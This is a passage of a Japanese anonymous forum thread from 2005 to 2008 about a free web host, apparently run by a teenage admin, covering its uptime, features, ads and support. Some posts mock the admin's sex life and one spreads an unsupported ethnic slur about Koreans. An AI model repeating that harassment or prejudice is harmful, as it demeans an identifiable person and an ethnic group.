</足の裏>

387 :名無しさん@お腹いっぱい。:2005/12/20(火) 13:02:52 0.net
>>386
漏れも最近思っていたがこんなこと書くと
鯖管乙とか自演乙とかいわれそう

実際に軽いしサポート言いし

388 :名無しさん@お腹いっぱい。:2005/12/20(火) 14:07:49 0.net
つかゲームCGI(高負荷CGI)不可、DBなしで
容量無制限とか何に使うんだ?厨寄せでしかなくね?

今の軽さをキープできなかったり鯖落ちまくりとかに
なりそうで怖いんだが。
マジ今のままでいいよ。譲歩できてアダルト別鯖。

389 :名無しさん@お腹いっぱい。:2005/12/20(火) 14:20:09 0.net
>>388
禿同
まぁ、幸いあんまり落ちないから結構いいけどな
ただ、アダルトとおんなじ鯖になったらどうなるかわからんし…
まぁ、別鯖だとサポート掲示板で言ってるし大丈夫だろ。
ただ、回線が持つか心配だがな

390 :名無しさん@お腹いっぱい。:2005/12/20(火) 16:59:10 0.net
まあ、多くなるとどこもおなじだっていうことに、はよきづけや!

391 :名無しさん@お腹いっぱい。:2005/12/20(火) 19:34:17 O.net
pf-x乙

392 :名無しさん@お腹いっぱい。:2005/12/21(水) 04:08:26 0.net
ってか、俺としては今一般ページここでも作ってるけど
アダルトサイトを今ロリピンクで作ってるんだがあれはだめだね。
俺としてはここにアダルト専用鯖導入希望

393 :名無しさん@お腹いっぱい。:2005/12/21(水) 22:37:58 0.net
でも鯖缶って未成年だろw
ヤバイんじゃないのかw

394 :名無しさん@お腹いっぱい。:2005/12/22(木) 00:36:02 0.net
>>393
ボランティアが見るんだろ?つサポート掲示板
鯖管が未成年でもアダルトおkなんかうじゃうじゃあるけどなww

395 :名無しさん@お腹いっぱい。:2005/12/22(木) 22:02:17 0.net
何気にもうアルファブレンドなんかと比べ物にならなくなっている件について

396 :名無しさん@お腹いっぱい。:2005/12/22(木) 22:10:27 0.net
次の審査マダー?

397 :名無しさん@お腹いっぱい。:2005/12/22(木) 22:18:02 0.net
>>395
目に見えてたことといえばそうだけど。
サポート掲示板を見るからによしあきは相当ユーザーからは好かれてると思う

>>396
今やってるが・・?
ただ、広告つくけど漏れは審査通過後速攻非表示申請したから問題ないが。
今回ははっきり言って余裕で取れた

398 :名無しさん@お腹いっぱい。:2005/12/22(木) 23:31:10 0.net
今見てみるとすごい大人の回答してるな・・・
pf-xとかとはもともとサービスが根本的に違うとしてもやっぱりよしあきの受け答えは大人の漏れから見るとすごい

と↓でpf-x信者光臨

399 :名無しさん@お腹いっぱい。:2005/12/22(木) 23:35:42 0.net
結構良い鯖だよね

400 :名無しさん@お腹いっぱい。:2005/12/23(金) 00:27:03 0.net
400get

401 :名無しさん@お腹いっぱい。:2005/12/23(金) 00:37:45 0.net
>>398-399
pf-x信者素直ww

402 :名無しさん@お腹いっぱい。:2005/12/23(金) 12:28:17 0.net
不覚ながらワラタ

403 :名無しさん@お腹いっぱい。:2005/12/24(土) 00:45:58 0.net
一週間経っても当選メール来なかったら落選?

404 :名無しさん@お腹いっぱい。:2005/12/24(土) 00:46:43 0.net
うん

405 :名無しさん@お腹いっぱい。:2005/12/24(土) 01:23:57 0.net
速攻ワロス

てか、あんな簡単な審査利用規約の質問の場所さえミスらなければ通過じゃね?
漏れ、規約の画面開きながら答えて
サイト内容:掲示板サイト
サーバの理由(だっけ?)は:友人に勧められた
で通過したぞ?

406 :名無しさん@お腹いっぱい。:2005/12/24(土) 01:25:44 0.net
ぶっちゃげ規約とか読まずに適当にしたら通った俺は勝ち組

407 :名無しさん@お腹いっぱい。:2005/12/24(土) 01:44:43 0.net
>>405
俺もそうやったけどまだメール来ない。
まだ一週間経ってないから気長に待ってみよう。

408 :405:2005/12/24(土) 02:45:41 0 ? .net
>>407
そういえば、おまいもしかして一番最初の
利用規約に同意しますか?のところ同意してないんじゃないの?
デフォで同意しないようになってるから
罠に引っかかったんじゃない?

409 :名無しさん@お腹いっぱい。:2005/12/24(土) 03:23:57 0.net
いや、ちゃんと同意するにしたよ。
でも他に良い所見つけちゃったから
もう当選しなくてもいいや。

410 :名無しさん@お腹いっぱい。:2005/12/24(土) 17:03:42 0.net
なんつーか初めて見た感想で言うと、
初心者向け?
DB無いし。。(PostgreSQLやMySQLの説明サイトはごろごろあるのにな。。)
ぶっちゃげ軽いのは、PCの性能とかそういう物のおかげじゃないし。。(ユーザーが少ないからなのか??)



>>394
よしあきだって15歳
ボランティアが見るわけないじゃまいかw

411 :名無しさん@お腹いっぱい。:2005/12/24(土) 17:14:30 0.net
DBいらねーよ

412 :405:2005/12/24(土) 21:02:45 0.net
>>411
多分DB入れると厨がたまるだけだと思ふ

413 :名無しさん@お腹いっぱい。:2005/12/25(日) 23:39:21 0.net
無料鯖でDBは流石にみたことないぞ?

414 :名無しさん@お腹いっぱい。:2005/12/26(月) 09:38:37 0.net
>>413
は?

415 :名無しさん@お腹いっぱい。:2005/12/26(月) 10:11:52 0.net
いや、あるだろ
使い物にならんのが多いが

416 :名無しさん@お腹いっぱい。:2005/12/26(月) 10:27:09 0.net
>>415
それならないほうがまし

417 :名無しさん@お腹いっぱい。:2005/12/26(月) 10:32:10 0.net
>>416
あった方が発展性有るんじゃ?
それで遅かったらスペックを見直したり、色々出来るし。

418 :名無しさん@お腹いっぱい。:2005/12/26(月) 10:43:43 0.net
発展性があるのは確かだが厨がたまる可能性もある

419 :名無しさん@お腹いっぱい。:2005/12/26(月) 12:37:14 0.net
メールマガジンを始めたらしいぞ。

420 :名無しさん@お腹いっぱい。:2005/12/26(月) 13:14:24 0.net
んま、あんまり 人を呼ばないでほしいところだな
今のところ快適だし

421 :coq ◆OOOOOkCOQc :2005/12/26(月) 13:16:04 O.net
確かにDBが使える無料鯖は
xrea(mySQL/pgSQL)
land.to(mySQL)
AAA(mySQL)
freespace(mySQL/DB)
usamimi(mySQL/pgSQL)
・・・
みたいに、多い訳では無いなw

ま、鯖官が使用容量の上限を設定する知識が無い場合は悲惨な事になるけどねw

422 :名無しさん@お腹いっぱい。:2005/12/26(月) 13:26:41 0.net
接続できないぞ!
よしあき何やってるんだ

423 :よしあき:2005/12/26(月) 13:48:45 0.net
ごめん、オナニーしてた

424 :名無しさん@お腹いっぱい。:2005/12/26(月) 14:01:37 0.net
>>422=>>423
はいはいわろすわろす

425 : ◆CoQSInE//U :2005/12/26(月) 22:27:49 0.net
無料鯖運営に対しての意気込みが感じられるので、もう少しスキルがあるなら良個人鯖、、、とは思う。

426 :名無しさん@お腹いっぱい。:2005/12/27(火) 02:12:10 O.net
確かにそうだよな…
なんか、友達みたいなサポートよりこういう企業みたいなサポートの方が気を使わなくていいし
見た目もそういう部分で大分左右されると思う

ベストの事はあんまり詳しくしらないけど、どっかの個人鯖みたいに趣味でやってます
みたいなのがなくて真剣な感じでいいと思った
<チラシノウラ>
という訳では応募してみたわけだが
ここは、個人的にはあんまり有名にしないで欲しいな
</チラシノウラ>

427 :オナニスト ◆MRmxpjiK.2 :2005/12/27(火) 05:18:05 0.net
基地外発見〜

428 :\_____________/:2005/12/27(火) 08:46:57 0.net
               ∨ 
    ビシッ  / ̄ ̄ ̄ ̄\
    / ̄\(  人____)     
  , ┤    ト|ミ/  ー◎-◎-)    
 |  \_/  ヽ    (_ _) )   
 |   __( ̄ |∴ノ  3 ノ    
 |    __)_ノ ヽ     ノ    
 ヽ___) ノ    ))   ヽ

429 :名無しさん@お腹いっぱい。:2005/12/27(火) 09:34:23 O.net
>>427
自己紹介乙!!

430 :名無しさん@お腹いっぱい。:2005/12/27(火) 12:35:30 0.net
基地外って、お前も人のこと言えないだろうが。。

431 : ◆CoQSInE//U :2005/12/27(火) 13:24:24 0.net
空気嫁

432 :名無しさん ◆iOqLxYOSHI :2005/12/28(水) 12:24:22 0.net
ベストスペースの旧HTML保管してみた
http://be-sp.hobby-site.com/p/
画像保管できなかったので、文字列imgに置き換えた。

433 :名無しさん@お腹いっぱい。:2005/12/28(水) 14:35:17 0.net
おまいも空気嫁

てかよくそんなファイルあったな。。

be-sp.ホビーサイトのトップを見る限り厨は寄り付かなそうでいいが。。
つか、無広告ページを定員制にしたのは正解だよな。
厨よけにはぴったりじゃね?

434 :名無しさん@お腹いっぱい。:2005/12/28(水) 18:40:22 0.net
ここを快適と思って使ってる奴は既に厨じゃないの?

435 :名無しさん@お腹いっぱい。:2005/12/28(水) 20:34:29 O.net
pf-x乙!!

436 :名無しさん@お腹いっぱい。:2005/12/28(水) 20:43:16 0.net
おまいの快適ってなんだ?
外見か?サポートか?中身か?使ってみりゃ軽さがわかる

快適かは別としてcoqが簡単に厨房鯖を良くいう事は滅多にないと思うが?

437 :名無しさん@お腹いっぱい。:2005/12/29(木) 11:33:39 0.net
>>436
coqがいつ言った?

438 :名無しさん@お腹いっぱい。:2005/12/29(木) 11:37:59 0.net
dalaを引き合いに出す時点で君たちは間違ってる
dalaが糞なのは当たり前
pf-xが糞なのも当たり前
そしてよしあきが糞なのも当たり前

なのにお前らは何故どんぐりの背比べのようなことを?

439 :名無しさん@お腹いっぱい。:2005/12/29(木) 12:05:42 0.net
sageろ

440 : ◆CoQSInE//U :2005/12/29(木) 14:31:38 0.net
>>437
http://pc8.2ch.net/test/read.cgi/hosting/1135431772/27
これはいい評価、、、だよね?

441 :名無しさん@お腹いっぱい。:2005/12/29(木) 14:35:34 O.net
>>438
必死だな!!どちらの方ですかwww
>>440
まあまあいい評価なんじゃないか?
漏れ的にはスキルがあれば完璧だと思うが

442 :名無しさん@お腹いっぱい。:2005/12/29(木) 15:36:01 0.net
オナニストのせいで空気ブチ壊しだな
まぁ定期的に>>438みたいな発言をしてくれるのもうれしいがなww

とりあえず、厨は寄ってこないでくれ

443 :名無しさん@お腹いっぱい。:2005/12/29(木) 18:24:41 0.net
 


444 :名無しさん@お腹いっぱい。:2005/12/30(金) 04:30:41 0.net
coqあき(笑

445 :名無しさん@お腹いっぱい。:2005/12/30(金) 10:52:38 0.net
コック?

446 :オナニスト ◆MRmxpjiK.2 :2005/12/30(金) 11:34:29 0.net
>>442
おいおいww
なんかしたか?
ここの鯖 今はいいよ軽いし。
でもね技術もないのにアダルト鯖にしようと検討してることが怖い。
アダルト鯖になったら動画配信しますのでお楽しみに!

447 :coq ◆OOOOOkCOQc :2005/12/30(金) 13:08:52 O.net
antionanist.orgって空いてる?

448 : ◆CoQSInE//U :2005/12/30(金) 13:43:56 0.net
オナニストには




     が     っ     か     り     だ

449 :名無しさん@お腹いっぱい。:2005/12/30(金) 18:09:36 0.net
日時: 2005/12/30 15:19
名前: drawing
参照: http://be-sp.com/drawing


ごめんなさい・・・・でも絶対ものにしてみます!!




450 :名無しさん@お腹いっぱい。:2005/12/30(金) 18:47:09 0.net
釣りだろ?

451 :名無しさん@お腹いっぱい。:2005/12/31(土) 01:13:48 O.net
釣りじゃないだろ?
サポート掲示板見てみろよ

452 :名無しさん@お腹いっぱい。:2006/01/04(水) 10:02:10 0.net
痛いよしあきと痛いユーザーの愉快な仲間達!

453 :名無しさん@お腹いっぱい。:2006/01/04(水) 11:21:58 0.net
はいはいそうですね。サブレくん

454 :名無しさん@お腹いっぱい。:2006/01/05(木) 18:26:16 0.net
ベストの広告にのまねこのバーナーが出ててワロタ

455 :名無しさん@お腹いっぱい。:2006/01/05(木) 18:44:55 0.net
しかもリンク先のまとめサイト、Web制作板の
コテ「CHUTA/ht4w」だということが分かった。
彼は信者だから…ということで嫌われていたようだが、やるな…w

456 :名無しさん@お腹いっぱい。:2006/01/05(木) 18:54:21 O.net
パソコン規制で携帯からw

のまねこ問題でググルと一発で出るからじゃね?

まあ、微力ながら協力者か

457 :名無しさん@お腹いっぱい。:2006/01/05(木) 19:11:47 0.net
微力じゃなくね?かなり強力なキガス

458 :名無しさん@お腹いっぱい。:2006/01/07(土) 00:16:06 0.net
「CGIファイルを10種以上置くこと 」

・・・罠?



459 :名無しさん@お腹いっぱい。:2006/01/09(月) 02:20:32 0.net
 サービスについて 
日時: 2005/10/29 17:04 
名前: lydiss◆qiwjyBNw1Xw 

ここの管理人さんは学生の方だと聞きましたが、
かなり優秀なサービスをやっていますよね。

ところで質問なのですが、
優秀な学生とはいえ、いつまでサービスが続くかどうかは微妙ですので、
もしよろしければほとんど確実にサービスを提供できるサービスの提供期間というものを教えてはもらえないでしょうか。


 Re: サービスについて ( No.1 ) 
日時: 2005/10/28 16:36
名前: 管理人

確実にご提供できるのは、1〜2年程度と思われます。
将来的にもサービスは続ける予定ですが、あまり先の事はわかりませんので。
また、規約にもありますとおり、サービスの中断・終了は当方の判断でできる物となっております。
その際、データ破損が原因でなければFTPでデータの返却をいたします。
上記のような形となります。よろしくお願いいたします。 

460 : ◆CoQSInE//U :2006/01/09(月) 18:04:28 0.net
1~2年きたな

461 :名無しさん@お腹いっぱい。:2006/01/10(火) 22:04:32 0.net
実写エロNGで
二次元エロOKなのがよく分からん。

462 :名無しさん@お腹いっぱい。:2006/01/10(火) 22:11:12 0.net
多分、管理の大変さと鯖への負担からだとおもふ

463 :名無しさん@お腹いっぱい。:2006/01/10(火) 22:57:37 0.net
>>459
1〜2ねんだと、馬鹿

464 :名無しさん@お腹いっぱい。:2006/01/10(火) 23:05:06 0.net
まぁ、二年は必ずやるだろうよ
ドメインもあるんだし
誰かメールで問い合わせキボンあれじゃ情報が古すぎる

465 :名無しさん@お腹いっぱい。:2006/01/11(水) 01:46:49 0.net
サポ板見てやっぱゲームCGI可って厨寄せなんだなーと実感しますた。

466 :名無しさん@お腹いっぱい。:2006/01/15(日) 08:53:07 0.net
■条件 
----------------------------------- 
容量は100M〜最大300Mまで(申請時100M) 

訂正な

467 :名無しさん@お腹いっぱい。:2006/01/16(月) 00:33:48 0.net
ここって初心者(CGI設置くらい)〜準中級者(データベースがいらない程度)
の人が使うのにちょうどよくね?
とくにCGI始めて設置する奴とかサポートがしっかりしてるから結構よさ気

データベースとかもうちょいあればいいんだがな。。
利用者リクエストキボン

468 :名無しさん@お腹いっぱい。:2006/01/17(火) 08:43:44 0.net
てかこの鯖別にまともに使えるんじゃね?
ただアンチと粘着がいるだけで、データベースとかいらない人にはちょうどいい

469 :名無しさん@お腹いっぱい。:2006/01/17(火) 23:22:54 0.net
微妙なところで引っかかる以外普通の鯖

470 :名無しさん ◆iOqLxYOSHI :2006/01/17(火) 23:38:02 0.net
そういや、退院したのか?

471 :名無しさん@お腹いっぱい。:2006/01/18(水) 00:13:48 0.net
11月頃にな

472 :名無しさん@お腹いっぱい。:2006/01/21(土) 04:20:48 0.net
鯖時計、19時で止まってる?
CGIの設定を変えても反応されない

473 :名無しさん@お腹いっぱい。:2006/01/21(土) 07:18:30 0.net
ここ時計おかしいから掲示板とか置くと最悪だなw

474 :名無しさん@お腹いっぱい。:2006/01/21(土) 09:08:18 0.net
な ん で す か 、 こ の 自 演 臭 が ぷ ん ぷ ん す る ス レ は … !!



誤解ないように言っておくと
俺はこの鯖についてよくしらないので糞鯖かどうかは知らんよ。
ただこのスレの雰囲気が気持ち悪いという話だ。

475 :名無しさん@お腹いっぱい。:2006/01/21(土) 09:50:04 0.net
何これ?→>>474

476 :名無しさん@お腹いっぱい。:2006/01/21(土) 09:50:50 0.net
何これ?→>>474

477 :名無しさん@お腹いっぱい。:2006/01/21(土) 10:58:23 O.net
P-FX乙!!

478 :名無しさん@お腹いっぱい。:2006/01/21(土) 11:31:38 0.net
>>472-473
普通に動いてるが?

嫉妬ですかサブレ君

479 :名無しさん@お腹いっぱい。:2006/01/21(土) 11:33:49 0.net
動いてるけど時刻がおかしいってんだよメクラ

480 :名無しさん@お腹いっぱい。:2006/01/21(土) 11:42:12 0.net
だから、雑談掲示板とかでテストしてみろよ

漏れが書いたときは動いてた

481 :名無しさん@お腹いっぱい。:2006/01/21(土) 11:58:19 0.net
普通に動いてたな

サブレ乙

482 :名無しさん@お腹いっぱい。:2006/01/21(土) 12:08:14 0.net
ネタにマジレス(ry

483 : ◆CoQSInE//U :2006/01/21(土) 14:17:39 0.net
でもこの中によしあきの自演が入っていることは事実っぽいw
まぁ最近安定してるからいいけど

484 :名無しさん@お腹いっぱい。:2006/01/21(土) 16:50:15 0.net
まあ、確かに安定してるよな
過去ログとか置いてもいいのかな?

てかよしあきって今年受験じゃなかったけ?
coqと違って書き込むヒマ(馬鹿)ないと思うが

485 :名無しさん@お腹いっぱい。:2006/01/21(土) 18:02:49 0.net
FTPの時刻は100%おかしい

486 :名無しさん@お腹いっぱい。:2006/01/29(日) 00:34:03 0.net
------------メンテナンスのお知らせ------------
■メンテナンス詳細
1.時刻:2006年1月28日(月)00:00〜04:00
2.影響範囲:ユーザー様のFTP接続不可
3.影響内容:FTP サービス
4.対応内容:FTPサーバシステム変更
5.注意事項:webページの接続は可能です。

1.時刻:2006年1月28日(月)00:00〜04:00

2006年1月28日(月)



487 :名無しさん@お腹いっぱい。:2006/01/29(日) 01:24:16 0.net
かわいい ミスだな

488 :名無しさん@お腹いっぱい。:2006/01/30(月) 08:57:37 0.net
一部記載ミスがありました。大変申し訳ございません。

489 :名無しさん@お腹いっぱい。:2006/02/05(日) 02:23:54 O.net
入院してる人に対して何言ってるんですか?

490 :名無しさん@お腹いっぱい。:2006/02/05(日) 02:28:48 0.net
フォー

491 :名無しさん@お腹いっぱい。:2006/02/05(日) 02:59:25 O.net
ファイブ

492 :名無しさん@お腹いっぱい。:2006/02/05(日) 03:01:10 0.net
シックス

493 :名無しさん@お腹いっぱい。:2006/02/05(日) 19:50:52 O.net
やっぱりベストは安定してるよな。
サポート関係も事務的だし、遊び鯖とはどこか違う
とても学生がやってるとは思えんな。。。
これで過去ログとwikiおければまとめサイト作るのに最高なんだが、
どうなんだ?>利用者

494 :名無しさん@お腹いっぱい。:2006/02/05(日) 19:58:38 0.net
いいよ

495 :名無しさん@お腹いっぱい。:2006/02/05(日) 21:10:53 0.net
>>493
管理人光臨きた。
なんで”ここってどうだ?”って聞く前に将軍様並みの賛辞をするんだ?

496 :名無しさん@お腹いっぱい。:2006/02/05(日) 21:17:26 0.net
サブレ君乙

497 :名無しさん@お腹いっぱい。:2006/02/06(月) 04:15:52 O.net
493は管理人では無いと思う。
書き込んだ時間に雪合戦していたから。


498 :名無しさん@お腹いっぱい。:2006/02/06(月) 06:41:46 0.net
誰やこれやって匿名bbs
にかいてどうするんだよ
www

499 :名無しさん@お腹いっぱい。:2006/02/06(月) 09:17:27 O.net
童貞よしあきワロス

500 :名無しさん@お腹いっぱい。:2006/02/06(月) 20:34:02 0.net
安定鯖

501 : ◆boot//5v0I :2006/02/07(火) 01:09:04 O.net
>>499
童貞じゃなくね?
1スレくらいに誰かが彼女がいるとか書いてあったべ?

502 :名無しさん@お腹いっぱい。:2006/02/07(火) 02:31:08 0.net
彼女がいたって童貞の可能性はある

とマジレス

503 :名無しさん@お腹いっぱい。:2006/02/07(火) 10:22:33 0.net
彼女=SEXという図式が童貞www

504 :coq ◆OOOOOkCOQc :2006/02/07(火) 12:55:38 O.net
つーか女を肉●器としてしか見てないだろ、お前、と。

505 :名無しさん@お腹いっぱい。:2006/02/07(火) 19:18:51 O.net
んで実際のところ、
coqも童貞なんだろ?

506 :coq ◆OOOOOkCOQc :2006/02/07(火) 23:19:03 O.net
はいでもいいえでもネタになるから書きません><

507 :名無しさん@お腹いっぱい。:2006/02/08(水) 00:00:32 0.net
coqテラワロス

つかよしあきのメッセのアドレスって過去ログにあった気がしたんだが、知ってるやついる?

あんなに事務的な対応するからコンタクトとってみたいんだが

508 :名無しさん@お腹いっぱい。:2006/02/08(水) 16:04:05 O.net
今さっきよしあきと別れました

509 :名無しさん@お腹いっぱい。:2006/02/08(水) 17:09:58 0.net
はいはいワロスワロス

510 :名無しさん@お腹いっぱい。:2006/02/09(木) 10:15:11 O.net
いや、本当に。
彼女でしたもん。


511 :名無しさん@お腹いっぱい。:2006/02/09(木) 12:07:42 0.net
はいはいワロスワロス

スレ以前に板違いです。

512 :名無しさん@お腹いっぱい。:2006/02/09(木) 20:13:18 O.net
変なのが湧いてきたな
少なくともよしあきみたいな事務的に作業を熟すやつに限ってネラーと付き合うなんて考えられん

脳内もほどほどにな
次はcoqをターゲットにするんだな、そっちの方がネタになる

513 :名無しさん@お腹いっぱい。:2006/02/10(金) 12:37:53 0.net
矛先変えるなよwww

514 :名無しさん@お腹いっぱい。:2006/02/10(金) 16:53:28 O.net
本当に付き合ってたし。
信じられへんの?


515 :名無しさん@お腹いっぱい。:2006/02/10(金) 20:57:02 0.net
板違い
厨房板か最悪板にでもどうぞ
coqあとは任せた

516 :名無しさん@お腹いっぱい。:2006/02/11(土) 00:32:33 O.net
よしあきって神奈川だよな?
>>信じられへんの?
これネタ確定

つか、いちいちあげんな

517 :名無しさん@お腹いっぱい。:2006/02/18(土) 21:26:04 0.net
http://minup.hp.infoseek.co.jp/cgi-bin/link/ranking.cgi
[21] ファイルバンク公認アップローダー new! 
管理者:上田義明 [URL] http://www.file-bank.net:8080/up/upload.html
  
分類 [うpろだ[〜100MB]]  アクセス情報 [ 総合:5 今月:5 前月:0 ] - 最終アクセス [2006/02/18-21:19:28]
無料ストレージサービス公認のUPローダー。日本法に反さないものならば問題なし。ダウンロードキーをつければ一切問題なし 



ダウンロードキーをつければ日本法とやらに反してもOK?www
さすがはよしあき!

518 :名無しさん@お腹いっぱい。:2006/02/18(土) 21:45:01 O.net
本当によしあきかどうかはわからんだろ?
レンタル鯖でサーバを宣伝して企業の評判を悪くしているのと同じ

519 :名無しさん@お腹いっぱい。:2006/02/18(土) 23:08:57 0.net
さすがとしあきや!

520 :名無しさん@お腹いっぱい。:2006/02/20(月) 02:44:25 P.net
http://www.filebank.co.jp/

521 :名無しさん@お腹いっぱい。:2006/02/22(水) 02:29:05 O.net
ベストの将来に期待保守

522 :名無しさん@お腹いっぱい。:2006/02/22(水) 02:29:46 O.net
ミスった


523 :名無しさん@お腹いっぱい。:2006/03/16(木) 18:11:04 0.net
なにこれ
http://be-sp.com/bestpage/

524 :名無しさん@お腹いっぱい。:2006/03/16(木) 18:22:22 0.net
>>523
宣伝乙

525 :名無しさん@お腹いっぱい。:2006/03/16(木) 18:52:45 0.net
レス早いなw
レン鯖支援サイトのくせに、支援者までYoshiaki Qualityで良いのかなと思って貼ってみた。

526 :名無しさん@お腹いっぱい。:2006/03/19(日) 12:09:28 0.net
うpろだ生きてる?

527 :名無しさん ◆iOqLxYOSHI :2006/03/20(月) 10:35:08 0.net
生きてるけどLAが25になってるw

528 :名無しさん ◆iOqLxYOSHI :2006/03/20(月) 12:31:02 0.net
LA40超えた

529 :名無しさん@お腹いっぱい。:2006/03/20(月) 14:19:53 O.net
400越えてるときもあったわけだが

530 :名無しさん@お腹いっぱい。:2006/03/20(月) 16:09:18 0.net
LAってなに?

531 :名無しさん@お腹いっぱい。:2006/03/21(火) 18:45:41 0.net
   有料なのに、鯖落ち9ヶ月。夜逃げ確定!?
   腐女子向け有料レンタルサーバー【COTERIE*WORLDS】
   https://coterie.ws/

   まとめサイト
   http://www.geocities.jp/coterie_ws/

COTERIEに比べたらリア厨が運営しているこの鯖の方がよっぽど
マシに見えてきた・・・。

532 :名無しさん@お腹いっぱい。:2006/03/21(火) 19:29:29 0.net
落ちてないか?

533 :名無しさん@お腹いっぱい。:2006/03/21(火) 19:31:18 0.net
落ちてなかった、重たかっただけだw

で、523のサイトクオリティ高いなwww
狙って作ってるだろw


534 :薇路儀:2006/03/21(火) 19:37:48 0.net
この名前よめる

535 :名無しさん@お腹いっぱい。:2006/03/21(火) 20:12:09 0.net
123456789

536 :名無しさん@お腹いっぱい。:2006/03/21(火) 21:57:50 0.net
>>531
だろうな

537 :名無しさん@お腹いっぱい。:2006/03/23(木) 02:35:48 0.net
うpろだ安定しないね

538 :名無しさん@お腹いっぱい。:2006/03/23(木) 02:55:11 0.net
>>537
直リン厨が多いからだろ

539 :名無しさん@お腹いっぱい。:2006/03/23(木) 05:51:33 0.net
>>538
kwsk

540 :名無しさん@お腹いっぱい。:2006/04/17(月) 12:52:38 0.net
鯖落ちてる?
全然繋がらないんだが。

541 :名無しさん@お腹いっぱい。:2006/04/17(月) 14:01:35 0.net
いいや!

542 :名無しさん@お腹いっぱい。:2006/04/17(月) 14:05:11 0.net
↑ちょwww本当に?

マジで繋がらないよ。
「サーバーが見つかりません」表示になる。
念のため他人のサイトも確認してみたけど駄目だった。

543 :名無しさん@お腹いっぱい。:2006/04/17(月) 14:12:55 0.net
フォー

544 :名無しさん@お腹いっぱい。:2006/04/17(月) 14:15:25 0.net


545 :名無しさん@お腹いっぱい。:2006/04/17(月) 17:26:20 0.net
外出して戻ってきたら直ってたw
よかったよかった。

546 :名無しさん@お腹いっぱい。:2006/04/17(月) 17:40:51 0.net
阻止

547 :名無しさん@お腹いっぱい。:2006/04/19(水) 01:33:03 0.net
障害情報表示されてるね。
そういや、最近ルーターの調子が悪いみたいだな

548 :名無しさん@お腹いっぱい。:2006/05/03(水) 15:28:23 0.net
サポートサイトが痛すぎwww

というか、なぜこれだけの糞鯖に誰も文句言わないのか詳細キボンヌ

549 :名無しさん@お腹いっぱい。:2006/05/03(水) 16:18:49 0.net
>>548
別に糞じゃないから
うさみみより落ちないし、サポートも一応機能してるし


もしかして、俺釣られた?

550 :名無しさん@お腹いっぱい。:2006/05/03(水) 18:30:02 0.net
釣りにマジレス(ry

551 :名無しさん@お腹いっぱい。:2006/05/12(金) 20:43:04 0.net
厨房鯖というだけで引いているオレガイル


552 :名無しさん@お腹いっぱい。:2006/05/13(土) 00:28:55 0.net
この手の鯖はネタで借りるのが基本。
本気でサイト運営している奴は馬鹿。

553 :名無しさん@お腹いっぱい。:2006/05/13(土) 01:15:11 0.net
なぜか、ここがあがると毎回おんなじレスでレンタル鯖板全体のスレッドが上げられてるわけだが
うぇぶたる鯖管が、この●悪用をなかったことにしたいのか?
【CGIゲーム】うぇぶたる【13個まで】
http://pc8.2ch.net/test/read.cgi/hosting/1107078344/

554 : ◆Os.9yamato :2006/06/05(月) 22:09:10 0.net
どう考えてもFileBankのうpろだって無駄にサーバーを潰している。
7.6Mとかのmp3を何個もうpってwww

555 :名無しさん@お腹いっぱい。:2006/06/05(月) 22:12:10 0.net
>>554
だったらうpしなきゃいいわけだが?

556 : ◆Os.9yamato :2006/06/06(火) 22:25:42 0.net
>>555
俺はうpしてないぜ。
そういうファイルがうpされているのは勿体ない気がしてな。
レンタルサーバーの方に回した方が、広告とかも表示できていいと思わないか?

557 :名無しさん@お腹いっぱい。:2006/06/06(火) 23:57:20 0.net
http://www.filebank.co.jp/
ストレージとして使うなら、こっちのがいくね?
同じような名前だしさ。

558 : ◆Os.9yamato :2006/06/07(水) 22:15:49 0.net
>>557
つーか、よしあきの鯖に故意に負担かけてる香具師がいる悪寒w
filebankとか同じ名前だなw

559 :名無しさん@お腹いっぱい。:2006/06/07(水) 22:31:38 0.net
まあfilebank(よしあきじゃない方)は定番だな

560 :名無しさん@お腹いっぱい。:2006/07/13(木) 22:43:58 0.net
あげ

561 :名無しさん ◆iOqLxYOSHI :2006/08/28(月) 10:18:44 0.net
ttp://best-network.jp/
代表 : 上田 義明
届出電気通信事業者

562 :名無しさん ◆iOqLxYOSHI :2006/08/28(月) 10:21:12 0.net
file-bank.netのアップローダ、Snぽいんだけどスクリプト名の表示無いな。

563 :名無しさん@お腹いっぱい。:2006/08/28(月) 11:02:40 0.net
>>562
あれって表記の有無自由だったはずだけど
変わったのか?

564 :名無しさん ◆iOqLxYOSHI :2006/08/28(月) 11:09:10 0.net
>>563
いや、自由だけど、もともとの表示の部分にサイトランキングのリンク入れてるからなんだか・・・

Total 58.6GBなのにUsed 66.8GBなんだけど、こういうもんだったっけ?


565 :名無しさん@お腹いっぱい。:2006/08/28(月) 11:23:13 0.net
>>564
ソースに手でもくわえたか、
あまりの負担にエラーとかじゃね?

作った人も適当に書いたみたいだし

566 :名無しさん@お腹いっぱい。:2006/08/29(火) 22:31:17 0.net
>>564
てか、あんなに利用者数多いところ
#ここttp://www.file-bank.net:8080/up/開いたとき見つけて自分のサイトのカウンターと同じで
#こっちみたらttp://www.otoku.net/viewstat.html?http://www.file-bank.net:8080/up/正直ありえん
にリンク貼られたほうがある意味迷惑な気がするのは気のせいか?

567 :名無しさん@お腹いっぱい。:2006/12/07(木) 05:39:16 0.net
広告なくなった?!!

568 :名無しさん@お腹いっぱい。:2006/12/07(木) 16:01:53 0.net
あるある

569 :名無しさん@お腹いっぱい。:2007/03/31(土) 02:38:08 0.net
///////////////////////////////////////////


570 :名無しさん@お腹いっぱい。:2007/06/09(土) 09:19:35 0.net
ひさしぶりにこの板に来たらベストスペースのスレがまだあった
はじまった当初はすぐ消えるだろうと思っていたがまだあったのか
よしあきは今幾つだ?

571 :名無しさん@お腹いっぱい。:2007/06/09(土) 10:51:03 0.net
18じゃなかったか?

572 :名無しさん@お腹いっぱい。:2007/10/03(水) 02:03:34 0.net
サポートサイト
ttp://be-sp.com/bestpage/
>Wiki難しいです。ちょっと諦めかけてます。

Wikiが難しいんじゃなくて、Wikiを動かないような設定にしてるがおかしいだけなのにw
YukiWiki系は一応動くけど。

573 :名無しさん@お腹いっぱい。:2008/05/21(水) 12:18:31 0.net
芸能界の成りすまし朝鮮人比率の高さは異常
日本人が差別されている

574 :名無しさん@お腹いっぱい。:2008/06/08(日) 18:37:13 0.net
結局、この鯖ってどうなのよ?

広告が下部1ケから上下になるとか書いてあるし。

575 :名無しさん@お腹いっぱい。:2008/06/08(日) 22:38:40 0.net
>>574
ちゃんと読んだのか?

576 :名無しさん@お腹いっぱい。:2008/09/12(金) 16:16:35 0.net
知らないうちに広告でかくなってた
なぜ毎日新聞問題にリンクしてるんだ…



577 :名無しさん@お腹いっぱい。:2008/09/12(金) 22:07:08 0.net
>>576
広告のオファーでも来たんじゃ?

